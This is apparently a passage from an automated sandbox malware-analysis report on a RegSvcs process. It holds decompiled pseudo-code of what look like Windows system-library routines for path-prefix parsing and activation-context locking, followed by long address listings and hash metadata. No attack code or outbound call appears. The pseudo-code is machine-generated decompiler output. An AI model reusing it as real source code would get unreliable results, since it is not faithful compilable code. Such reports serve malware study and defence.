											_t316 = E01316E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M013145F8))) {
												case 0:
													_v568 = 0x12d1078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0x12d11c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L01314620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															E0133F720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															E0133F720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E012F52A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E0130EB70(1, 0x13e79a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E0130AA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E013395D0();
																			L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return E0133B640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E01333D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return E0133B640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}















































































                                          0x01314128
                                          0x01314135
                                          0x0131413c
                                          0x01314141
                                          0x01314145
                                          0x01314147
                                          0x0131414e
                                          0x01314151
                                          0x01314159
                                          0x0131415c
                                          0x01314160
                                          0x01314164
                                          0x01314168
                                          0x0131416c
                                          0x0131417f
                                          0x01314181
                                          0x0131446a
                                          0x0131446a
                                          0x0131418c
                                          0x01314195
                                          0x01314199
                                          0x01314432
                                          0x01314439
                                          0x0131443d
                                          0x01314442
                                          0x01314447
                                          0x00000000
                                          0x0131419f
                                          0x013141a3
                                          0x013141b1
                                          0x013141b9
                                          0x013141bd
                                          0x013145db
                                          0x013145db
                                          0x00000000
                                          0x013141c3
                                          0x013141c3
                                          0x013141ce
                                          0x013141d4
                                          0x0135e138
                                          0x0135e13e
                                          0x0135e169
                                          0x0135e16d
                                          0x0135e19e
                                          0x0135e16f
                                          0x0135e16f
                                          0x0135e175
                                          0x0135e179
                                          0x0135e18f
                                          0x0135e193
                                          0x00000000
                                          0x0135e199
                                          0x00000000
                                          0x0135e199
                                          0x0135e193
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x013141da
                                          0x013141da
                                          0x013141df
                                          0x013141e4
                                          0x013141ec
                                          0x01314203
                                          0x01314207
                                          0x0135e1fd
                                          0x01314222
                                          0x01314226
                                          0x0135e1f3
                                          0x0135e1f3
                                          0x0131422c
                                          0x0131422c
                                          0x01314233
                                          0x0135e1ed
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x01314239
                                          0x01314239
                                          0x01314239
                                          0x01314239
                                          0x01314233
                                          0x01314226
                                          0x013141ee
                                          0x013141ee
                                          0x013141f4
                                          0x01314575
                                          0x0135e1b1
                                          0x0135e1b1
                                          0x00000000
                                          0x0131457b
                                          0x0131457b
                                          0x01314582
                                          0x0135e1ab
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x01314588
                                          0x01314588
                                          0x0131458c
                                          0x0135e1c4
                                          0x0135e1c4
                                          0x00000000
                                          0x01314592
                                          0x01314592
                                          0x01314599
                                          0x0135e1be
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0131459f
                                          0x0131459f
                                          0x013145a3
                                          0x0135e1d7
                                          0x0135e1e4
                                          0x00000000
                                          0x013145a9
                                          0x013145a9
                                          0x013145b0
                                          0x0135e1d1
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x013145b6
                                          0x013145b6
                                          0x013145b6
                                          0x00000000
                                          0x013145b6
                                          0x013145b0
                                          0x013145a3
                                          0x01314599
                                          0x0131458c
                                          0x01314582
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x013141f4
                                          0x0131423e
                                          0x01314241
                                          0x013145c0
                                          0x013145c4
                                          0x00000000
                                          0x013145ca
                                          0x013145ca
                                          0x00000000
                                          0x0135e207
                                          0x0135e20f
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x013145d1
                                          0x00000000
                                          0x00000000
                                          0x013145ca
                                          0x00000000
                                          0x01314247
                                          0x01314247
                                          0x01314247
                                          0x01314249
                                          0x01314249
                                          0x01314249
                                          0x01314251
                                          0x01314251
                                          0x01314257
                                          0x0131425f
                                          0x0131426e
                                          0x01314270
                                          0x0131427a
                                          0x0135e219
                                          0x0135e219
                                          0x01314280
                                          0x01314282
                                          0x01314456
                                          0x013145ea
                                          0x00000000
                                          0x013145f0
                                          0x0135e223
                                          0x00000000
                                          0x0135e223
                                          0x0131445c
                                          0x0131445c
                                          0x00000000
                                          0x0131445c
                                          0x00000000
                                          0x01314288
                                          0x0131428c
                                          0x0135e298
                                          0x01314292
                                          0x01314292
                                          0x0131429e
                                          0x013142a3
                                          0x013142a7
                                          0x013142ac
                                          0x0135e22d
                                          0x013142b2
                                          0x013142b2
                                          0x013142b9
                                          0x013142bc
                                          0x013142c2
                                          0x013142ca
                                          0x013142cd
                                          0x013142cd
                                          0x013142d4
                                          0x0131433f
                                          0x0131433f
                                          0x013142d6
                                          0x013142d6
                                          0x013142d9
                                          0x013142dd
                                          0x013142eb
                                          0x0135e23a
                                          0x013142f1
                                          0x01314305
                                          0x0131430d
                                          0x01314315
                                          0x01314318
                                          0x0131431f
                                          0x01314322
                                          0x0131432e
                                          0x0131433b
                                          0x0131433b
                                          0x00000000
                                          0x0131432e
                                          0x013142eb
                                          0x0131434c
                                          0x0131434e
                                          0x01314352
                                          0x01314359
                                          0x0131435e
                                          0x01314361
                                          0x0131436e
                                          0x0131438a
                                          0x0131438e
                                          0x01314396
                                          0x0131439e
                                          0x013143a1
                                          0x013143ad
                                          0x013143bb
                                          0x013143bb
                                          0x013143ad
                                          0x0131436e
                                          0x013143bf
                                          0x013143c5
                                          0x01314463
                                          0x01314463
                                          0x013143ce
                                          0x013143d5
                                          0x013143d9
                                          0x013143df
                                          0x01314475
                                          0x01314479
                                          0x01314491
                                          0x01314491
                                          0x01314479
                                          0x013143e5
                                          0x013143eb
                                          0x013143f4
                                          0x013143f6
                                          0x013143f9
                                          0x013143fc
                                          0x013143ff
                                          0x013144e8
                                          0x013144ed
                                          0x013144f3
                                          0x0135e247
                                          0x00000000
                                          0x013144f9
                                          0x01314504
                                          0x01314508
                                          0x0131450f
                                          0x0135e269
                                          0x00000000
                                          0x01314515
                                          0x01314519
                                          0x01314531
                                          0x01314534
                                          0x01314537
                                          0x0131453e
                                          0x01314541
                                          0x0131454a
                                          0x0135e255
                                          0x0135e255
                                          0x0135e25b
                                          0x0135e25e
                                          0x0135e261
                                          0x0135e261
                                          0x01314555
                                          0x01314559
                                          0x0131455d
                                          0x0135e26d
                                          0x0135e270
                                          0x0135e274
                                          0x0135e27a
                                          0x0135e27d
                                          0x0135e28e
                                          0x0135e28e
                                          0x01314563
                                          0x01314563
                                          0x01314569
                                          0x01314569
                                          0x00000000
                                          0x0131455d
                                          0x0131450f
                                          0x00000000
                                          0x013144f3
                                          0x013143ff
                                          0x01314405
                                          0x01314405
                                          0x01314405
                                          0x013142ac
                                          0x0131428c
                                          0x01314282
                                          0x01314407
                                          0x0131440d
                                          0x0135e2af
                                          0x0135e2af
                                          0x01314413
                                          0x01314413
                                          0x00000000
                                          0x013141d4
                                          0x00000000
                                          0x013141c3
                                          0x013141bd
                                          0x01314415
                                          0x01314415
                                          0x01314416
                                          0x01314417
                                          0x01314429
                                          0x0131416e
                                          0x0131416e
                                          0x01314175
                                          0x01314498
                                          0x0131449f
                                          0x0135e12d
                                          0x00000000
                                          0x0135e133
                                          0x00000000
                                          0x0135e133
                                          0x013144a5
                                          0x013144a5
                                          0x013144aa
                                          0x00000000
                                          0x013144bb
                                          0x013144ca
                                          0x013144d6
                                          0x013144d7
                                          0x013144d8
                                          0x013144e3
                                          0x013144e3
                                          0x013144aa
                                          0x0131417b
                                          0x0131417b
                                          0x0131417b
                                          0x00000000
                                          0x0131417b
                                          0x01314175
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0205f77027392056653fe80edf20bca236fe95d5a9f8869ec0b53e0c483a4fb1
                                          • Instruction ID: a65f6f5c4f505d47384a18b36eaaa184260c8f4c92f09ac3c08b6e842619736c
                                          • Opcode Fuzzy Hash: 0205f77027392056653fe80edf20bca236fe95d5a9f8869ec0b53e0c483a4fb1
                                          • Instruction Fuzzy Hash: A1F18D706083118FD728CF19C480A7ABBE5FF88758F04892EF996CB695E734D991CB52
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 013220A0 Relevance: .4, Instructions: 420COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 92%
                                          			E013220A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
				signed int _v16;
				signed int _v20;
				signed char _v24;
				intOrPtr _v28;
				signed int _v32;
				void* _v36;
				char _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				char _v64;
				unsigned int _v68;
				signed int _v72;
				char _v73;
				signed int _v74;
				char _v75;
				signed int _v76;
				void* _v81;
				void* _v82;
				void* _v89;
				void* _v92;
				void* _v97;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t128;
				void* _t129;
				signed int _t130;
				void* _t132;
				signed char _t133;
				intOrPtr _t135;
				signed int _t137;
				signed int _t140;
				signed int* _t144;
				signed int* _t145;
				intOrPtr _t146;
				signed int _t147;
				signed char* _t148;
				signed int _t149;
				signed int _t153;
				signed int _t169;
				signed int _t174;
				signed int _t180;
				void* _t197;
				void* _t198;
				signed int _t201;
				intOrPtr* _t202;
				intOrPtr* _t205;
				signed int _t210;
				signed int _t215;
				signed int _t218;
				signed char _t221;
				signed int _t226;
				char _t227;
				signed int _t228;
				void* _t229;
				unsigned int _t231;
				void* _t235;
				signed int _t240;
				signed int _t241;
				void* _t242;
				signed int _t246;
				signed int _t248;
				signed int _t252;
				signed int _t253;
				void* _t254;
				intOrPtr* _t256;
				intOrPtr _t257;
				unsigned int _t262;
				signed int _t265;
				void* _t267;
				signed int _t275;

				_t198 = __ebx;
				_t267 = (_t265 & 0xfffffff0) - 0x48;
				_v68 = __ecx;
				_v73 = 0;
				_t201 = __edx & 0x00002000;
				_t128 = __edx & 0xffffdfff;
				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
				_v72 = _t128;
				if((_t128 & 0x00000008) != 0) {
					__eflags = _t128 - 8;
					if(_t128 != 8) {
						L69:
						_t129 = 0xc000000d;
						goto L23;
					} else {
						_t130 = 0;
						_v72 = 0;
						_v75 = 1;
						L2:
						_v74 = 1;
						_t226 =  *0x13e8714; // 0x0
						if(_t226 != 0) {
							__eflags = _t201;
							if(_t201 != 0) {
								L62:
								_v74 = 1;
								L63:
								_t130 = _t226 & 0xffffdfff;
								_v72 = _t130;
								goto L3;
							}
							_v74 = _t201;
							__eflags = _t226 & 0x00002000;
							if((_t226 & 0x00002000) == 0) {
								goto L63;
							}
							goto L62;
						}
						L3:
						_t227 = _v75;
						L4:
						_t240 = 0;
						_v56 = 0;
						_t252 = _t130 & 0x00000100;
						if(_t252 != 0 || _t227 != 0) {
							_t240 = _v68;
							_t132 = E01322EB0(_t240);
							__eflags = _t132 - 2;
							if(_t132 != 2) {
								__eflags = _t132 - 1;
								if(_t132 == 1) {
									goto L25;
								}
								__eflags = _t132 - 6;
								if(_t132 == 6) {
									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
									if( *((short*)(_t240 + 4)) != 0x3f) {
										goto L40;
									}
									_t197 = E01322EB0(_t240 + 8);
									__eflags = _t197 - 2;
									if(_t197 == 2) {
										goto L25;
									}
								}
								L40:
								_t133 = 1;
								L26:
								_t228 = _v75;
								_v56 = _t240;
								__eflags = _t133;
								if(_t133 != 0) {
									__eflags = _t228;
									if(_t228 == 0) {
										L43:
										__eflags = _v72;
										if(_v72 == 0) {
											goto L8;
										}
										goto L69;
									}
									_t133 = E012F58EC(_t240);
									_t221 =  *0x13e5cac; // 0x16
									__eflags = _t221 & 0x00000040;
									if((_t221 & 0x00000040) != 0) {
										_t228 = 0;
										__eflags = _t252;
										if(_t252 != 0) {
											goto L43;
										}
										_t133 = _v72;
										goto L7;
									}
									goto L43;
								} else {
									_t133 = _v72;
									goto L6;
								}
							}
							L25:
							_t133 = _v73;
							goto L26;
						} else {
							L6:
							_t221 =  *0x13e5cac; // 0x16
							L7:
							if(_t133 != 0) {
								__eflags = _t133 & 0x00001000;
								if((_t133 & 0x00001000) != 0) {
									_t133 = _t133 | 0x00000a00;
									__eflags = _t221 & 0x00000004;
									if((_t221 & 0x00000004) != 0) {
										_t133 = _t133 | 0x00000400;
									}
								}
								__eflags = _t228;
								if(_t228 != 0) {
									_t133 = _t133 | 0x00000100;
								}
								_t229 = E01334A2C(0x13e6e40, 0x1334b30, _t133, _t240);
								__eflags = _t229;
								if(_t229 == 0) {
									_t202 = _a20;
									goto L100;
								} else {
									_t135 =  *((intOrPtr*)(_t229 + 0x38));
									L15:
									_t202 = _a20;
									 *_t202 = _t135;
									if(_t229 == 0) {
										L100:
										 *_a4 = 0;
										_t137 = _a8;
										__eflags = _t137;
										if(_t137 != 0) {
											 *_t137 = 0;
										}
										 *_t202 = 0;
										_t129 = 0xc0000017;
										goto L23;
									} else {
										_t242 = _a16;
										if(_t242 != 0) {
											_t254 = _t229;
											memcpy(_t242, _t254, 0xd << 2);
											_t267 = _t267 + 0xc;
											_t242 = _t254 + 0x1a;
										}
										_t205 = _a4;
										_t25 = _t229 + 0x48; // 0x48
										 *_t205 = _t25;
										_t140 = _a8;
										if(_t140 != 0) {
											__eflags =  *((char*)(_t267 + 0xa));
											if( *((char*)(_t267 + 0xa)) != 0) {
												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
											} else {
												 *_t140 = 0;
											}
										}
										_t256 = _a12;
										if(_t256 != 0) {
											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
										}
										_t257 =  *_t205;
										_v48 = 0;
										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
										_v56 = 0;
										_v52 = 0;
										_t144 =  *( *[fs:0x30] + 0x50);
										if(_t144 != 0) {
											__eflags =  *_t144;
											if( *_t144 == 0) {
												goto L20;
											}
											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
											goto L21;
										} else {
											L20:
											_t145 = 0x7ffe0384;
											L21:
											if( *_t145 != 0) {
												_t146 =  *[fs:0x30];
												__eflags =  *(_t146 + 0x240) & 0x00000004;
												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
													_t147 = E01317D50();
													__eflags = _t147;
													if(_t147 == 0) {
														_t148 = 0x7ffe0385;
													} else {
														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
													}
													__eflags =  *_t148 & 0x00000020;
													if(( *_t148 & 0x00000020) != 0) {
														_t149 = _v72;
														__eflags = _t149;
														if(__eflags == 0) {
															_t149 = 0x12d5c80;
														}
														_push(_t149);
														_push( &_v48);
														 *((char*)(_t267 + 0xb)) = E0132F6E0(_t198, _t242, _t257, __eflags);
														_push(_t257);
														_push( &_v64);
														_t153 = E0132F6E0(_t198, _t242, _t257, __eflags);
														__eflags =  *((char*)(_t267 + 0xb));
														if( *((char*)(_t267 + 0xb)) != 0) {
															__eflags = _t153;
															if(_t153 != 0) {
																__eflags = 0;
																E01377016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
																L01312400(_t267 + 0x20);
															}
															L01312400( &_v64);
														}
													}
												}
											}
											_t129 = 0;
											L23:
											return _t129;
										}
									}
								}
							}
							L8:
							_t275 = _t240;
							if(_t275 != 0) {
								_v73 = 0;
								_t253 = 0;
								__eflags = 0;
								L29:
								_push(0);
								_t241 = E01322397(_t240);
								__eflags = _t241;
								if(_t241 == 0) {
									_t229 = 0;
									L14:
									_t135 = 0;
									goto L15;
								}
								__eflags =  *((char*)(_t267 + 0xb));
								 *(_t241 + 0x34) = 1;
								if( *((char*)(_t267 + 0xb)) != 0) {
									E01312280(_t134, 0x13e8608);
									__eflags =  *0x13e6e48 - _t253; // 0x0
									if(__eflags != 0) {
										L48:
										_t253 = 0;
										__eflags = 0;
										L49:
										E0130FFB0(_t198, _t241, 0x13e8608);
										__eflags = _t253;
										if(_t253 != 0) {
											L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
										}
										goto L31;
									}
									 *0x13e6e48 = _t241;
									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
									__eflags = _t253;
									if(_t253 != 0) {
										_t57 = _t253 + 0x34;
										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
										__eflags =  *_t57;
										if( *_t57 == 0) {
											goto L49;
										}
									}
									goto L48;
								}
								L31:
								_t229 = _t241;
								goto L14;
							}
							_v73 = 1;
							_v64 = _t240;
							asm("lock bts dword [esi], 0x0");
							if(_t275 < 0) {
								_t231 =  *0x13e8608; // 0x0
								while(1) {
									_v60 = _t231;
									__eflags = _t231 & 0x00000001;
									if((_t231 & 0x00000001) != 0) {
										goto L76;
									}
									_t73 = _t231 + 1; // 0x1
									_t210 = _t73;
									asm("lock cmpxchg [edi], ecx");
									__eflags = _t231 - _t231;
									if(_t231 != _t231) {
										L92:
										_t133 = E01326B90(_t210,  &_v64);
										_t262 =  *0x13e8608; // 0x0
										L93:
										_t231 = _t262;
										continue;
									}
									_t240 = _v56;
									goto L10;
									L76:
									_t169 = E0132E180(_t133);
									__eflags = _t169;
									if(_t169 != 0) {
										_push(0xc000004b);
										_push(0xffffffff);
										E013397C0();
										_t231 = _v68;
									}
									_v72 = 0;
									_v24 =  *( *[fs:0x18] + 0x24);
									_v16 = 3;
									_v28 = 0;
									__eflags = _t231 & 0x00000002;
									if((_t231 & 0x00000002) == 0) {
										_v32 =  &_v36;
										_t174 = _t231 >> 4;
										__eflags = 1 - _t174;
										_v20 = _t174;
										asm("sbb ecx, ecx");
										_t210 = 3 |  &_v36;
										__eflags = _t174;
										if(_t174 == 0) {
											_v20 = 0xfffffffe;
										}
									} else {
										_v32 = 0;
										_v20 = 0xffffffff;
										_v36 = _t231 & 0xfffffff0;
										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
										_v72 =  !(_t231 >> 2) & 0xffffff01;
									}
									asm("lock cmpxchg [edi], esi");
									_t262 = _t231;
									__eflags = _t262 - _t231;
									if(_t262 != _t231) {
										goto L92;
									} else {
										__eflags = _v72;
										if(_v72 != 0) {
											E0133006A(0x13e8608, _t210);
										}
										__eflags =  *0x7ffe036a - 1;
										if(__eflags <= 0) {
											L89:
											_t133 =  &_v16;
											asm("lock btr dword [eax], 0x1");
											if(__eflags >= 0) {
												goto L93;
											} else {
												goto L90;
											}
											do {
												L90:
												_push(0);
												_push(0x13e8608);
												E0133B180();
												_t133 = _v24;
												__eflags = _t133 & 0x00000004;
											} while ((_t133 & 0x00000004) == 0);
											goto L93;
										} else {
											_t218 =  *0x13e6904; // 0x400
											__eflags = _t218;
											if(__eflags == 0) {
												goto L89;
											} else {
												goto L87;
											}
											while(1) {
												L87:
												__eflags = _v16 & 0x00000002;
												if(__eflags == 0) {
													goto L89;
												}
												asm("pause");
												_t218 = _t218 - 1;
												__eflags = _t218;
												if(__eflags != 0) {
													continue;
												}
												goto L89;
											}
											goto L89;
										}
									}
								}
							}
							L10:
							_t229 =  *0x13e6e48; // 0x0
							_v72 = _t229;
							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
								E0130FFB0(_t198, _t240, 0x13e8608);
								_t253 = _v76;
								goto L29;
							} else {
								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
								asm("lock cmpxchg [esi], ecx");
								_t215 = 1;
								if(1 != 1) {
									while(1) {
										_t246 = _t215 & 0x00000006;
										_t180 = _t215;
										__eflags = _t246 - 2;
										_v56 = _t246;
										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
										asm("lock cmpxchg [edi], esi");
										_t248 = _v56;
										__eflags = _t180 - _t215;
										if(_t180 == _t215) {
											break;
										}
										_t215 = _t180;
									}
									__eflags = _t248 - 2;
									if(_t248 == 2) {
										__eflags = 0;
										E013300C2(0x13e8608, 0, _t235);
									}
									_t229 = _v72;
								}
								goto L14;
							}
						}
					}
				}
				_t227 = 0;
				_v75 = 0;
				if(_t128 != 0) {
					goto L4;
				}
				goto L2;
			}











































































                                          0x013220a0
                                          0x013220a8
                                          0x013220ad
                                          0x013220b3
                                          0x013220b8
                                          0x013220c2
                                          0x013220c7
                                          0x013220cb
                                          0x013220d2
                                          0x01322263
                                          0x01322266
                                          0x01365836
                                          0x01365836
                                          0x00000000
                                          0x0132226c
                                          0x0132226c
                                          0x01322270
                                          0x01322274
                                          0x013220e2
                                          0x013220e2
                                          0x013220e6
                                          0x013220ee
                                          0x013657dc
                                          0x013657de
                                          0x013657ec
                                          0x013657ec
                                          0x013657f1
                                          0x013657f3
                                          0x013657f8
                                          0x00000000
                                          0x013657f8
                                          0x013657e0
                                          0x013657e4
                                          0x013657ea
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x013657ea
                                          0x013220f4
                                          0x013220f4
                                          0x013220f8
                                          0x013220f8
                                          0x013220fc
                                          0x01322100
                                          0x01322106
                                          0x01322201
                                          0x01322206
                                          0x0132220b
                                          0x0132220e
                                          0x013222a9
                                          0x013222ac
                                          0x00000000
                                          0x00000000
                                          0x013222b2
                                          0x013222b5
                                          0x01365801
                                          0x01365806
                                          0x00000000
                                          0x00000000
                                          0x01365810
                                          0x01365815
                                          0x01365818
                                          0x00000000
                                          0x00000000
                                          0x0136581e
                                          0x013222bb
                                          0x013222bb
                                          0x01322218
                                          0x01322218
                                          0x0132221c
                                          0x01322220
                                          0x01322222
                                          0x013222c2
                                          0x013222c4
                                          0x013222dc
                                          0x013222dc
                                          0x013222e1
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x013222e7
                                          0x013222c8
                                          0x013222cd
                                          0x013222d3
                                          0x013222d6
                                          0x01365823
                                          0x01365825
